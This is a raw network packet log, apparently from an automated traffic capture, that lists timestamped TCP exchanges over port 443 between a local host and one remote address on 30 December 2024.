                                                                                                                                                                            Dec 30, 2024 11:48:42.367181063 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.367228985 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.367270947 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.367379904 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.367492914 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.367544889 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.367551088 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.367559910 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.367597103 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.367652893 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.367700100 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.367892981 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.367935896 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.367945910 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.367949009 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.367975950 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.367981911 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.367993116 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.367999077 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.368022919 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.368046045 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.368077993 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.368122101 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.368195057 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.368243933 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.368364096 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.368417025 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.439438105 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.439495087 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.439533949 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.439621925 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.439649105 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.439688921 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.439733028 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.443500042 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.443598986 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.443698883 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.443742990 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.443751097 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.443754911 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.443787098 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.443809032 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.450026035 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.450093031 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.450129032 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.450134039 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.450153112 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.450181961 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.450186968 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.450201988 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.450227976 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.451350927 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.451414108 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.451422930 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.451426983 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.451457024 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.451478004 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.451695919 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.451736927 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.451749086 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.451752901 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.451770067 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.451786995 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.451792955 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.451812983 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.451829910 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.451941967 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.451997042 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.452106953 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.452143908 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.452156067 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.452159882 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.452210903 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.452250957 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.452426910 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.452480078 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.452483892 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.452495098 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.452531099 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.452548981 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.452562094 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.452605009 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.452615023 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.452619076 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.452656984 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.452773094 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.452810049 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.452821970 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.452826977 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.452848911 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.452852964 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.452864885 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.452867985 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.452889919 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.452919006 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.523853064 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.523901939 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.523941994 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.523988008 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.524007082 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.524065018 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.524097919 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.528089046 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.528132915 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.528166056 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.528166056 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.528176069 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.528192997 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.528213978 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.528230906 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.534410000 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.534466028 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.534492970 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.534498930 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.534534931 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.534548998 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.534611940 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.534671068 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.536042929 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.536088943 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.536108971 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.536113977 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.536123037 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.536127090 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.536147118 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.536150932 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.536174059 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.536191940 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.536205053 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.536211014 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.536228895 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.536245108 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.536254883 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.536259890 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.536283016 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.536286116 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.536305904 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.536309958 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.536340952 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.536365986 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.536626101 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.536674023 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.536683083 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.536686897 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.536720991 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.536746025 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.536794901 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.536801100 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.536833048 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.536847115 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.536850929 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.536880016 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.536897898 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.537118912 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.537173033 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.537185907 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.537236929 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.537242889 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.537282944 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.537301064 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.537305117 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.537328005 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.537353039 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.608401060 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.608455896 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.608489990 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.608575106 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.608587027 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.608611107 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.608670950 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.612477064 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.612548113 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.612704992 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.612744093 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.612770081 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.612775087 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.612798929 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.612818003 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.619005919 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.619080067 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.619107008 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.619129896 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.619143009 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.619143009 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.619168997 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.619174004 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.619196892 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.619225025 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.622376919 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.622462034 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.622600079 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.622661114 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.622665882 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.622677088 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.622721910 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.622733116 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.622733116 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.622740030 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.622765064 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.622773886 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.622796059 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.622800112 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.622844934 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.622864008 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.623008013 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.623059988 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.623064041 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.623070955 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.623099089 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.623110056 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.623120070 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.623122931 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.623147964 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.623182058 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.623334885 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.623389959 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.623409033 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.623447895 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.623459101 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.623462915 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.623500109 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.623681068 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.623744965 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.623750925 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.623805046 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.623806953 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.623815060 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.623863935 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.692907095 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.692965984 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.693003893 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.693031073 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.693036079 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.693064928 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.693178892 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.695322990 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.697169065 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.697215080 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.697263956 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.697278023 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.697293043 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.697314024 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.703370094 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.703493118 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.703506947 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.703517914 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.703545094 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.703551054 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.703563929 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.703582048 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.703602076 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.703608036 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.703625917 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.703629017 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.703680038 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.703680038 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.706881046 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.706954002 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.706964016 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.706980944 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.706991911 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.707010984 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.707079887 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.707124949 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.707130909 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.707166910 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.707200050 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.707242012 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.707427979 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.707468987 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.707482100 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.707489967 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.707505941 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.707525969 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.707704067 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.707742929 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.707751989 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.707763910 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.707782984 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.707801104 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.707802057 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.707808971 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.707844973 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.707987070 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.708028078 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.708110094 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.708149910 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.708168983 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.708210945 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.708246946 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.708301067 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.777360916 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.777415037 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.777447939 CET4434970523.109.93.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:48:42.777546883 CET49705443192.168.2.823.109.93.100
                                                                                                                                                                            Dec 30, 2024 11:48:42.777575016 CET4434970523.109.93.100192.168.2.8
